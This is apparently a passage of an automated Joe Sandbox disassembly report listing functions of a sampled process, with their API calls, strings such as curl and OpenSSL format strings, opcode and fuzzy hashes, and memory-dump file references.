                                                                                                                                                                                                                                                            • Instruction ID: 5bb95e14b118b5b0333927f1d1f30cc019a9942585efe536aebedbf3387ca606
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4d38e11eb2932ca2d7895d38621203d6848b9f5461c503c0227dc2ca8abdf3a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6914BB45147019FE314DF25D889B5ABBF4FF44308F004928E9498B392E7B6E968CF92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetEnvironmentVariableW.KERNEL32 ref: 00417898
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                            • String ID: 0$OPENSSL_ia32cap$~$~
                                                                                                                                                                                                                                                            • API String ID: 1431749950-728030840
                                                                                                                                                                                                                                                            • Opcode ID: 8352c0d1d55f23bcca1520d989ada6767b92e544bfa0dd49bd3b69e4bb971365
                                                                                                                                                                                                                                                            • Instruction ID: 96055e3b9358e31c56498879af19314678201591848d546740faea5fe2882008
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8352c0d1d55f23bcca1520d989ada6767b92e544bfa0dd49bd3b69e4bb971365
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18719DB1A1C3428BD310EF15D4452ABBAF1FB94740F55482EE8C49B350E7BC89C8DB96
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %0*lu, xrefs: 002412A5
                                                                                                                                                                                                                                                            • internal error: invalid pattern type (%d), xrefs: 0024133A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupstrlen
                                                                                                                                                                                                                                                            • String ID: %0*lu$internal error: invalid pattern type (%d)
                                                                                                                                                                                                                                                            • API String ID: 1960160495-449433499
                                                                                                                                                                                                                                                            • Opcode ID: a90865ca58a853adf8f006c7aea8745f40cfdf0d07a6451f0e945be30ae656aa
                                                                                                                                                                                                                                                            • Instruction ID: 5071ee10a0a27ae0b1654b98bd7784fc28c502d90c89bbcc20127b3f0d25d040
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a90865ca58a853adf8f006c7aea8745f40cfdf0d07a6451f0e945be30ae656aa
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5561C235618302DFC729CF59C480A6ABBE1EF89308F45499DE48997752D7B0EEA0CF52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlentime
                                                                                                                                                                                                                                                            • String ID: %s:%d$@*sv
                                                                                                                                                                                                                                                            • API String ID: 3241370836-3200690115
                                                                                                                                                                                                                                                            • Opcode ID: 1c2882f2cb0287f2e005f1b384b7984ddf9919a718b06dcad1fdfdbefbebde0c
                                                                                                                                                                                                                                                            • Instruction ID: 3fee7e3c6e078688f3bd6eff9ab464d100532afe2d842f60cdbc571f48b7b917
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c2882f2cb0287f2e005f1b384b7984ddf9919a718b06dcad1fdfdbefbebde0c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 892149B19102405FE720AF299C44B7676F8AB4030EF080039FD0986212F37ADD28C7BB
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfree
                                                                                                                                                                                                                                                            • String ID: a
                                                                                                                                                                                                                                                            • API String ID: 1865132094-3904355907
                                                                                                                                                                                                                                                            • Opcode ID: cdc8de9500dd490a1b0c50d1c5d776705da7c4ae17eef0a6f11bbb3bc6596b26
                                                                                                                                                                                                                                                            • Instruction ID: 184937c4866689b0e0c78e8be675ce4dfaaf57b118b02d2009593c23ee8f81e8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdc8de9500dd490a1b0c50d1c5d776705da7c4ae17eef0a6f11bbb3bc6596b26
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B215EF06243438BDB14DF28C8487AA77E4AF40348F184579F4599F281EB76DC62CB92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023A201
                                                                                                                                                                                                                                                              • Part of subcall function 0023E510: free.MSVCRT ref: 0023E535
                                                                                                                                                                                                                                                              • Part of subcall function 0023E510: free.MSVCRT ref: 0023E547
                                                                                                                                                                                                                                                              • Part of subcall function 0023E510: free.MSVCRT ref: 0023E559
                                                                                                                                                                                                                                                              • Part of subcall function 0023E510: free.MSVCRT ref: 0023E562
                                                                                                                                                                                                                                                            • fclose.MSVCRT ref: 0023A233
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023A24C
                                                                                                                                                                                                                                                            • strcmp.MSVCRT ref: 0023A2A4
                                                                                                                                                                                                                                                            • fopen.MSVCRT ref: 0023A2B6
                                                                                                                                                                                                                                                            • _strdup.MSVCRT(?), ref: 0023A438
                                                                                                                                                                                                                                                              • Part of subcall function 00239DE0: fwrite.MSVCRT ref: 00239E00
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$_strdupfclosefopenfwritestrcmp
                                                                                                                                                                                                                                                            • String ID: out of memory
                                                                                                                                                                                                                                                            • API String ID: 1610934139-49810860
                                                                                                                                                                                                                                                            • Opcode ID: 57474bc692a88fed8c9a96bf7beec5597db72f0cb786f41582c17d4acec7552e
                                                                                                                                                                                                                                                            • Instruction ID: eb75d6718370959a7489a67aea54a5b7d825b221d94c2a2c77b6b325f9980d29
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57474bc692a88fed8c9a96bf7beec5597db72f0cb786f41582c17d4acec7552e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3321F9F5A183408FD724DF15D845B9AB7E4AB84304F04887EE98D97351E776E924CB13
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _strdup.MSVCRT(curl/7.64.0), ref: 0023F14D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdup
                                                                                                                                                                                                                                                            • String ID: curl/7.64.0$host$out of memory$proxy
                                                                                                                                                                                                                                                            • API String ID: 1169197092-2067908195
                                                                                                                                                                                                                                                            • Opcode ID: 38acba8d0fe243fba8d6c7851428a90b7ae46f7fcc52b0ce69b6d7cd3bf7e2f8
                                                                                                                                                                                                                                                            • Instruction ID: 96fc34191afc243fb15d136bf4724f6cead3ecaf3428fdc9dd614b71b494e86e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38acba8d0fe243fba8d6c7851428a90b7ae46f7fcc52b0ce69b6d7cd3bf7e2f8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F11A0B1E2024ADBEB618E15FD11BDB36AC9B80355F044436EC4C8A291E774CE29CBB1
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                            • String ID: %c%c%c%c$%c%c%c=$%c%c==
                                                                                                                                                                                                                                                            • API String ID: 39653677-3943651191
                                                                                                                                                                                                                                                            • Opcode ID: a69b56388c7b4a7ea2aa62de8de835f208120f131386d259eed0991d022e0f5e
                                                                                                                                                                                                                                                            • Instruction ID: 0ad2223362775a00b38bbdf4d8a85fd948689187b386f111146f2305a60edd71
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a69b56388c7b4a7ea2aa62de8de835f208120f131386d259eed0991d022e0f5e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F44177B15187516BE314DF28CCC1A3BBBE4EBC5306F08456DF9854B352E238D911CBA2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,FFFFFFFF,?,?,00000000,0025DEC4,?), ref: 0024D741
                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0024D74D
                                                                                                                                                                                                                                                              • Part of subcall function 0024D4B0: EnterCriticalSection.KERNEL32(?,?,?,?,0024D638), ref: 0024D4C3
                                                                                                                                                                                                                                                              • Part of subcall function 0024D4B0: LeaveCriticalSection.KERNEL32(?), ref: 0024D4D6
                                                                                                                                                                                                                                                              • Part of subcall function 0024D4B0: DeleteCriticalSection.KERNEL32(00000000), ref: 0024D4FD
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$Delete
                                                                                                                                                                                                                                                            • String ID: Could not resolve %s: %s$host$proxy
                                                                                                                                                                                                                                                            • API String ID: 2284602516-2205167006
                                                                                                                                                                                                                                                            • Opcode ID: a1999a7c7ca70304fecd52fe4123fc8ffc6bd6b9c8f513b4fd8459db72d30746
                                                                                                                                                                                                                                                            • Instruction ID: 64ecfe252b006428d02446479d6bd6075526ecab40509b99b00eecc34382c3d0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1999a7c7ca70304fecd52fe4123fc8ffc6bd6b9c8f513b4fd8459db72d30746
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D731F375B107029FEB199F64DC80B6AB7A6FF88304F04803DE91A47351DB76A829DF91
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                            • String ID: %*s$%s%ldL);$%s(long)%s%s$curl_easy_setopt(hnd, %s,
                                                                                                                                                                                                                                                            • API String ID: 39653677-3167448197
                                                                                                                                                                                                                                                            • Opcode ID: ed3901cbfdcda40d4155a19663e499991d9255dc65681d107d686cd1b28ef7d9
                                                                                                                                                                                                                                                            • Instruction ID: 688d0aad512af1a8e236871fdb67c1b13f7b93da8940a2651008eb6713a83fd1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed3901cbfdcda40d4155a19663e499991d9255dc65681d107d686cd1b28ef7d9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54113AB2F5031167EB64AA11AE52F3B3B99DBD1F48F14002EFD48A6381F605DC2087E6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                            • String ID: %*s$%s%luUL);$%s(long)%s%s$curl_easy_setopt(hnd, %s,
                                                                                                                                                                                                                                                            • API String ID: 39653677-843713100
                                                                                                                                                                                                                                                            • Opcode ID: 043b291ee3594aae68a73006947a7cbfdff1469bb366e1be621a6d43654f311e
                                                                                                                                                                                                                                                            • Instruction ID: 1d75419f9bf2a0b46b9806d962c50ff3cdb5f4dc9688ddbc80f95238e776a5e2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 043b291ee3594aae68a73006947a7cbfdff1469bb366e1be621a6d43654f311e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE112BF3F5030167EB64AD11EE62F3B779A9B85F4DF14006EFD04A6391E605DC2086A6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: freerealloc$fread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 913911637-0
                                                                                                                                                                                                                                                            • Opcode ID: 549b6971a846cb3e81ee0ce978e0021001d6b95e3209e8623850afe899ca3203
                                                                                                                                                                                                                                                            • Instruction ID: 6d23604e4def2f68af85ed892381543512821b1117a7447355f78a1ec59b83d4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 549b6971a846cb3e81ee0ce978e0021001d6b95e3209e8623850afe899ca3203
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 771106E3E2425347EF60AD759C40B67B28D9BD4354F17087AED55D3282F561EC1883B1
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 39653677-0
                                                                                                                                                                                                                                                            • Opcode ID: a71bbcaca3df796b5cc798ee14f8b75764bd8a5a3c99f346f9411258e134d78b
                                                                                                                                                                                                                                                            • Instruction ID: 3cefb7f4b851339abf9566cd016a6848e74726b0710ff8eee2b06543e4a414ee
